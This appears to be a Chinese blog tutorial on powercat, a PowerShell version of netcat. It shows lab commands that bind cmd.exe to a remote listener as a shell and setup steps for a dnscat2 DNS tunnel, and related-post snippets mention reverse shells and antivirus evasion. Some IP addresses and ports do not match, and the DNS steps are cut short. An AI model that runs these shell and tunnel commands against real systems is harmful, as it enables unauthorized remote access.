工具之powercat使用教程

最新推荐文章于 2024-11-04 17:56:06 发布
最新推荐文章于 2024-11-04 17:56:06 发布
阅读量3.7k 收藏 5
点赞数
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/108904697
版权

下载

地址:https://github.com/besimorhino/powercat

运行

使用:

由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。

kali:192.168.206.128

win10:192.168.206.1

-e Execute. Specify the name of the process to start.

运行。开启运行一个程序

正向连接

Windows上的powercat正向连接Kali上的nc

kali上开启监听:

  • nc -lvvp 4444

win10将本地上的cmd.exe程序连接到kali的4444端口

  • Import-Module .\powercat.ps1
  • powercat -c 192.168.10.11 -p 8888 -e cmd.exe

反向链接

kali上的nc反向链接到windows上的powercat

kali:

  • nc 192.168.206.1 4444 -vv

win10 

  • Import-Module .\powercat.ps1
  • powercat -l -p 8888 -e cmd.exe -v

Powercat DNS隧道通信

PowerCat也是一套基于DNS通信的协议,PowerCat的DNS通信是基于dnscat。所以,在使用DNS隧道通信前,需要在我们的VPS上安装dnscat。

vps上安装dnscat

1,安装git: yum -y install git

2,下载dnscat:  git clone https://github.com/iagox86/dnscat2.git

3,cd dnscat2/server/

yum -y install gem

4,gem install bundler

版本过低

参考升级版本:https://www.cnblogs.com/xzlive/p/13596829.html

5,bundle install

6,vps上执行

7,目标机上执行

 

 

 

 

 

参考大佬文章:

https://www.cnblogs.com/ly584521/p/12360704.html

https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Powershell工具Powercat(可以理解为免杀nc)
墨痕诉清风的博客
04-15 1103
Powershell工具Powercat(可以理解为免杀nc)
传输层Powercat.ps1隧道
战神/calmness的博客
11-19 322
目录 描述 过程 用IEX下载远程PS1脚本回来权限绕过执行 正向连接(WINDOWS连接KALI) WINDOWS之间互弹SHELL 描述 •PowerCat是Netcat的Powershell版本 •由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。 命令参数 •-c 指定一个ip地址 •-p 指定一个端口 •-v 显示详情 •-l 监听模式,用于入站链接 •..
PowerCat 介绍
f_carey的博客
10-17 1177
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PowerCat 介绍1 PowerCat 基础2 实验环境3 利用 NC 正向连接 PowerCat4 利用 NC 反向连接 PowerCat5 利用 PowerCat 返回 PowerShell6 利用 PowerCat 生成 Payload6.1 正向 Payload6.2 反向 Payload7 利用.
Powercat:强大的 PowerShell 版 Netcat 工具
gitblog_00040的博客
05-12 612
Powercat:强大的 PowerShell 版 Netcat 工具 powercatnetshell features all in version 2 powershell项目地址:https://gitcode.com/gh_mirrors/po/powercat 项目介绍 Powercat 是一个功能齐全的 PowerShell 实现版的 Netcat。它允许你在 PowerShell...
推荐一款功能强大的网络工具PowerCat
gitblog_00035的博客
08-09 282
推荐一款功能强大的网络工具PowerCat powercatnetshell features all in version 2 powershell项目地址:https://gitcode.com/gh_mirrors/po/powercat 项目介绍 在网络安全和系统管理领域,PowerShell的灵活性和强大性为脚本编写者提供了无尽的可能性。其中,PowerCat是一个基于PowerSh...
powercat工具详细分析
weixin_34128411的博客
09-18 2524
本文讲的是powercat工具详细分析,这个工具出来两年了,但是好像很少人知道他。国外的大牛们用的比较多,国内的文章出现powercat关键字的寥寥无几,更别说有这款工具的详细用法了。 0x01 powercat简介 是NetCat的Powershell版本。作者的介绍也是这样写的,但是我觉得,powercat不管怎么样,也有比NetCat强的...
Ladon8.9扫描器简明教程/用法例子
K8哥哥
05-31 8757
前言 本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。 完整文档:http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机(IP、机器名、MAC地址、制造商) Ladon 192.168.1.8/24 OnlinePC 002 多协议扫描存活主机(IP、机器名、操作系统版本、开放服务) Ladon 192.168.1.8/24 OsScan 003 扫描存活主机 Ladon 192.168.1.8
2024年网络安全最新内网渗透之传输层隧道搭建_内网隧道工具lcx
2401_84297455的博客
05-03 1191
通过以下命令在本地监听端口,当有访问时会在命令行输出信息。在本地VPS主机中输入以下命令,开始监听并等待连接。一旦连接建立,数据将流入。在目标主机中输入以下命令,与VPS的333端口建立连接,并传输名为test.txt的文本文件。传输完成后,在VPS中打开1.txt文件,即可查看传输过来的数据。在本地VPS主机中输入以下命令,开始监听。在目标主机中输入以下命令,即可开始简易聊天。Shell 分为两种,一种是正向 Shell,另一种是反向 Shell。
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx(1),看这一篇就够了
2401_84300239的博客
05-06 1093
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。在一般情况下,目‍标主机中是没有 nc 的。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx,2024最新网络安全面试题目
2401_84300255的博客
05-06 734
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Ladon反弹Shell系列教程(MSF/NC/Runas)
K8哥哥
01-05 823
title: 〖教程〗Ladon反弹Shell系列教程 comments: true toc: true categories: Ladon ReverseShell msf tags: Ladon ReverseShell abbrlink: ReverseShell date: 2020-06-28 23:20:00 img: <% Visit %> 反弹TCP Usage: Ladon ReverseTcp ip port type type:.
PowerCat反弹Shell
qq_64177395的博客
11-04 745
PowerCat是一个powershell写的tcp/ip瑞士军刀,可以看成ncat的powershell的实现,然后里面也 加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
PowerCat隧道搭建
weixin_45007073的博客
04-23 562
PowerCat隧道搭建简介下载PowerCat通过nc正向连接PowerCat通过nc反向连接PowerCat通过PowerCat返回Powershell通过PowerCat传输文件用PowerCat生成PayloadPowerCat DNS隧道通信将PowerCat作为跳板 简介 PowerCat可以说是nc的PowerShell版本。PowerCat可以通过执行命令回到本地执行,也可以远程权限执行。 下载PowerCat 这是PowerCat的github下载地址 https://github.com
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 289
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shell(windows-linux)powercat 反向shell(windows-linux)powercat 反向powershell(w...
内网工具powercat使用(附内网环境实现)
markecheng的博客
12-07 864
前言 Powercat功能也是非常的强大,同nc都是传输层的内网利用工具PowerCat可以说是powershell版本的nc,PoweCat可以通过执行命令回到本地执行,也可以使用远程权限执行,这次我们实现 实验拓扑图如: 我们的主要目标过程是:使用kali攻击机、windows 2008 R2、以及windows 7 三台电脑来实现powerCat常用功能,以及natcat正反向连接powercat Kali安装powercat: git clone https://github.com/besim
powerCat进行常规tcp端口转发
weixin_30312659的博客
04-03 198
实战中,我们也会遇到需要我们进行端口转发的情况,比如已经拿下的目标机1是在dmz区,而目标1所在内网的其他目标只能通过目标1去访问,这时候我们就需要端口转发或者代理来进行后渗透。这次就要介绍一个加强版的nc,基于powershell的后渗透工具 Powercat 下载地址:Lhttps://github.com/besimorhino/powercat 0x01 power...
【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat使用:正反向shell、文件传输、dns隧道、生成powershell payload、内网转发)】
AA8j的博客
10-22 1078
写在前面:PowerCat是PowerShell版本的nc,主要用于windows平台。 1 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) DC(内网地址:10.1.1.2) 2 下载与部署 2.1 下载 下载地址:https://github.com/besimorhino/powerc
使用Powercat.ps1脚本进行网络编程
Book_Sea的博客
08-14 245
在网络和系统管理中,脚本是一个非常有用的工具,它可以帮助我们自动化一些重复性的任务。Powercat.ps1是一个非常受欢迎的脚本,它提供了一种简便的方式来连接远程主机、执行命令以及传输文件。在本文中,我们将详细介绍Powercat.ps1脚本的用法,并通过示例代码演示其功能。总结起来,Powercat.ps1是一个非常有用的脚本工具,它可以帮助我们进行网络编程和系统管理。希望本文可以帮助你了解Powercat.ps1脚本的用法和功能,如果你有任何问题或疑问,请随时提问。[port]是你指定的监听端口。
PowerCat 开源项目使用教程
gitblog_00478的博客
08-23 276
PowerCat 开源项目使用教程 PowerCatA PowerShell TCP/IP swiss army knife.项目地址:https://gitcode.com/gh_mirrors/pow/PowerCat 一、项目目录结构及介绍 PowerCat 是一个基于 GitHub 的开源项目,链接为 https://github.com/secabstraction/PowerCat....
window使用nc
最新发布
02-23
### 使用 `nc` 命令行工具在 Windows 系统中的方法 #### 方法一:通过 WSL (Windows Subsystem for Linux) 对于希望在一个更接近原生 Linux 环境下工作的用户,在 Windows 10 上可以启用并使用 Bash on Ubuntu on Windows 功能[^1]。这不仅提供了完整的 Bash 环境,还包含了丰富的 Unix 命令行工具集,其中包括 `netcat(nc)` 工具。 一旦启用了此功能,则可以直接打开 Windows Terminal 或者通过开始菜单启动 "Ubuntu" 应用程序来访问该环境下的命令行界面,并在此环境中输入标准形式的 `nc` 指令来进行操作。 #### 方法二:直接安装适用于 Windows 的 Netcat 版本 另一种方式是在 Windows 平台上单独获取一个适合于 Windows 操作系统的版本——通常称为 nmap.org 提供的 Ncat 实现或是其他第三方移植版。然而需要注意的是某些情况下可能会触发防病毒警告[^4];因此建议从官方渠道下载资源以确保安全性。 当选择了合适的发行包之后按照说明完成安装过程即可正常使用 netcat(`nc`)的功能特性: - `-l`: 设置监听模式以便接收来自远程主机的数据流; - `-p <port>`: 明确指明本地计算机用来通讯的具体端口号; - `-s`: 当存在多个网络接口时定义哪一个作为数据发送源头; - `-u`: 切换至 UDP 而不是默认选项 TCP 进行传输层协议的选择; - `-v`: 获取详细的日志反馈信息帮助调试问题所在; - `-w`: 设定等待连接建立的最大时限; - `-z`: 执行端口扫描而不实际传送任何有效载荷给目标机器[^2]。 ```powershell # 创建一个简单的TCP服务器实例 nc -lvnp 8080 ``` #### 方法三:利用 PowerCat 替代传统 NC 考虑到兼容性和潜在的安全提示问题,还可以考虑采用专门为 PowerShell 编写且具备相似特性的替代品—PowerCat。这款工具同样能够实现诸如创建反向Shell、绑定Shell以及文件上传/下载等任务,并且由于其完全构建于 PowerShell 之上所以不存在额外依赖项的问题[^3]。 ```powershell Import-Module .\PowerCat.ps1 Invoke-PowerCat -c 192.168.1.100 -p 4444 -e cmd.exe ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值